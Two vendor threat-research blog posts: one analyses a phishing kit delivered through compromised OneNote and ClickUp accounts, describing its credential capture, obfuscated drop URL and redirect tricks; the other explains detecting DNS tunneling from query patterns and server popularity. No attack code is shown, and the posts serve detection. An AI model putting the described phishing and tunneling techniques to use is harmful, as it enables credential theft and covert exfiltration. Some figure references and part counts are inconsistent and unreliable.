Analysis of Phishing Kill Chain Identifies Emerging Technique That Exploits Trust in Your Collaboration Platforms

Think of phishing and most people will think of cleverly crafted emails designed to get you to click on malicious links. But new research shows that increasingly attackers are turning to seemingly legitimate and implicitly trusted collaboration tools to penetrate enterprise defenses. Here’s what they’re doing and how you (or your security vendor) can detect...
Analysis of Phishing Kill Chain Identifies Emerging Technique That Exploits Trust in Your Collaboration Platforms Think of phishing and most people will think of cleverly crafted emails designed to get you to click on malicious links. But new research shows that increasingly attackers are turning to seemingly legitimate and implicitly trusted collaboration tools to penetrate enterprise defenses. Here's what they're doing and how you (or your security vendor) can detect and stop these attacks. Phishing Attacks Tap Collaboration Platforms Phishing continues to be one of the most dangerous threats to organizations as an initial vector to infiltrate the network organization or to steal organization credentials. We see, on average, 8,000 entrances to phishing sites per month, all of which are blocked or logged by the Cato SASE Cloud (Figure 1). [caption id="attachment_22118" align="alignnone" width="568"] Figure 1 – On average, we’re seeing 8,000 entrances to phishing sites per month[/caption] The bulk of phishing attacks typically rely on email domains such as Gmail to make it appear to unsuspecting victims that they are just receiving one more innocuous message from a trusted domain. But increasingly, we’re seeing the use of compromised accounts such as Microsoft “OneNote” and “ClickUp” to distribute URLs that are actually phishing attacks. Collaboration platforms have, in effect, become another vehicle for distributing malware. [boxlink link="https://www.catonetworks.com/resources/ransomware-is-on-the-rise-catos-security-as-a-service-can-help?utm_source=blog&utm_medium=top_cta&utm_campaign=ransomware_ebook"] Ransomware is on the Rise – Cato’s Security as a Service can help | Get the eBook [/boxlink] Staying Under the Radar The delivery stage of such an attack starts with an email from a compromised email account in one organization, usually a known partner, that doesn’t attract suspicion. The use of a real email account makes the phishing attack appear to be a legitimate email. Unfortunately, the email is anything but legitimate. It typically contains some social-engineering script with a link to a compromised “OneNote” or “ClickUp” account that makes it challenging to detect. In the case illustrated below, the “OneNote” account even contains a “look-alike” file that is an image resource with a link that redirects the phishing victim to what appears to be the Office 365 landing page. The OneNote account is even designed to be replaced by other compromised accounts if the account being used is reset. [caption id="attachment_22092" align="alignnone" width="724"] Figure 2 – The overall phishing attack flow starts with an “innocent” email (1) linking to a compromised account (2), such as OneNote, which redirects the victim to what looks like an Office 365 login page(3). [/caption] It turns out phishing attack is also hosted on a legitimate service called “Glitch” that is typically used for web development. The cybercriminals in this example made sure the attack would go undetected from delivery all the way to the final landing page by most of the security tools organizations commonly employ. Phishing Kit Anatomy These attacks are also unique in that once credentials are submitted, the victim’s data is being sent using HTTP-POST to the “drop URL” that is placed in a remote server. In most of the attacks that we’ve analyzed, the most common PHP remote drop file name was named next.php or n.php. Fortunately, many of the perpetrators of these attacks don’t remove the phishing kit from the attack’s web server. By probing the site, you may find the phishing kit placed within the site such as the Office 365 example below: [caption id="attachment_22094" align="alignnone" width="2064"] Figure 3– Open directory listing contains phishing kit [/caption] This analysis makes it then possible to identify characteristics of the phishing kit that can be used to find new ways to block phishing domains that now routinely include collaboration platforms. Phishing Kit Code Analysis Going deeper, we also dissected some of the kit to uncover a few interesting pieces of code that are worth noting. For example, we can see the email that is used to receive the victim information (see Figure 8.). Usually, phishing kits are sold on the Darknet for relatively low prices. Looking at the analyzed PHP code snippet of the phishing kit (Figure 8), the “$recipient” variable should be filled by the buyer's drop email to capture the compromised credentials. However, the comment “Put your email address here” also make it easy for even someone with no coding skills to configure the attack settings. [caption id="attachment_22096" align="alignnone" width="1088"] Figure 4 – phishing kit code settings[/caption] In addition, we can see the $finish_url variable is set to Office’s o365. That means once the credentials are submitted the victim will be redirected to the official O365 website, so they don’t suspect that he was a victim of a phishing scam. Another interesting element is the validation of the authentication. If the authentication is validated then the victim information will be encoded with bas64 and sent to a specific chosen URL. The URL is encoded in base64 to obfuscate the URL destination (inside the function base64_decode). The purpose of this URL is to be used as a DB file with all the victim’s information. [caption id="attachment_22098" align="alignnone" width="2456"] Figure 5 – Authentication code snippet[/caption] As can be shown in the snippet (Figure 8) the information that the phishing scam exfiltrated is not only the credentials of the victim but also additional information such as client IP, country, region, and city. [caption id="attachment_22100" align="alignnone" width="2406"] Figure 6 – Exfiltrated information[/caption] We have also analyzed domains that use the same phishing kit so we can see a few network characteristics that can be used to block this campaign. For example, once you submit the credentials you receive the following response from the server {"signal":"ok","msg":"InValid Credentials"}. We have observed similar responses received from different phishing domains that use the same kit. This behavior can be used to detect a user that inserted information required by the phishing attack. Attackers Are Able to Evade Phishing Solutions While there are many solutions for detecting phishing, we still see adversaries finding new techniques to evade them. The use of trusted collaboration platforms is more much insidious than the familiar email-based attack that most security teams already know how to counter. However, it’s also apparent that by examining code and network attributes, IT teams can detect and stop these attacks.    

How to Detect DNS Tunneling in the Network?

In the past several years, we have seen multiple malware samples using DNS tunneling to exfiltrate data. In June, Microsoft Security Intelligence warned about BazarCall (or BazaLoader), a scam infecting victims with malware to get them to call a phony call center. BazarCall can lead to Anchor malware that uses DNS tunneling to communicate with...
How to Detect DNS Tunneling in the Network? In the past several years, we have seen multiple malware samples using DNS tunneling to exfiltrate data. In June, Microsoft Security Intelligence warned about BazarCall (or BazaLoader), a scam infecting victims with malware to get them to call a phony call center. BazarCall can lead to Anchor malware that uses DNS tunneling to communicate with C2 servers. APT groups also used DNS tunneling in a malware campaign to target government organizations in the Middle East. We will present a few techniques you can use to detect DNS tunneling in your network. DNS Tunneling in a Nutshell So how do attackers use DNS tunneling in their malware? It’s simple: First, they register a domain that is used as a C&C server. Next, the malware sends DNS queries to the DNS resolver. Then the DNS server routes the query to the C2 server. Finally, the connection between the C2 server and the infected host is established. For attackers, DNS tunneling provides a convenient way to exfiltrate data and to gain access to a network because DNS communications are often unblocked. At the same time, DNS tunneling has very distinct network markers that you can use to detect DNS tunneling on your network. [boxlink link="https://www.catonetworks.com/resources/eliminate-threat-intelligence-false-positives-with-sase?utm_source=blog&utm_medium=top_cta&utm_campaign=eliminate_threat_ebook"] Eliminate Threat Intelligence False Positives with SASE | Download eBook [/boxlink] DNS Tunnel to an Any Device In terms of network markers, TXT type queries are very common in DNS tunneling. However, DNS tunneling can also be used in uncommon query types, such as type 10 (NULL). To detect DNS tunneling in your network you need to examine long DNS queries and uncommon DNS query types, distinguish between legitimate security solutions as AVs and malicious traffic, and distinguish between human-generated DNS traffic and Bot-generated traffic. In the following example, we will analyze the algorithm behind the DNS tunneling traffic that we have seen in our customer networks. We have seen many cases of DNS tunneling used on Windows, however in the following example it was used on Android. Examine the Algorithm Generating the DNS We have seen a few common characteristics where DNS queries were used on Android DNS tunneling use-cases.  In the screenshot (figure 1) we can see the same algorithm used in multiple DNS queries. We have broken the algorithm into eight parts:  [caption id="attachment_19801" align="alignnone" width="1842"] Figure 1 - DNS tunneling example[/caption] In figure 1, we can see the same algorithm used in multiple DNS queries. We have broken the algorithm into 5 parts: There are 4-11 characters in the first part - Red The first 6 characters in the second part are repeated between different queries - Blue There are 63 characters in the next parts - Yellow The last section has 10 characters - Black The first letter in the second part is repeated with a unified string - Green By examining the algorithm, we can understand that these DNS queries originate from the same Bot, since they have the same algorithm. We can also assume it is Bot traffic, since it's a unified algorithm that is repeated in different DNS queries. Bot-generated traffic tends to be consistent and uniform. Examine the Destination Next, we examine the destination of the DNS queries. By examining the destination, we identify several unknown servers. When we examined what other DNS queries those servers received, we couldn’t find any except the tunneling queries.  If you can’t find any legitimate traffic to the DNS server, it’s another indicator that this is server may be used by malware. Examine the Popularity Given a sufficiently large networks, developing an algorithm for measuring the popularity of IP/Domain among your users will also help hunt malware. By using such a Popularity algorithm across the hundreds of thousands of users on the Cato network, we can see that the popularity of the servers in the DNS queries to be low. Low popularity of an IP is often an indicator of a malicious server as the server may only used by the malware. Low popularity alone, however, is insufficient to determine a malicious site. It must be joined with other indicators, such as the ones outlined above. Conclusion DNS tunneling is an old technique that allows attackers to communicate with C2 servers and exfiltrate data through many firewalls. Focusing on the network characteristics, though, allows the threat to be identified. In our case, we found multiple DNS queries generated by an algorithm, a destination with unknown servers, and servers that were unpopular. Any one indicator alone may not reflect malicious communications but together there’s a very high probability that this session is malicious — a fact that we validated through manual investigation. It was an excellent example of how combining networking and security information can lead to better threat detection.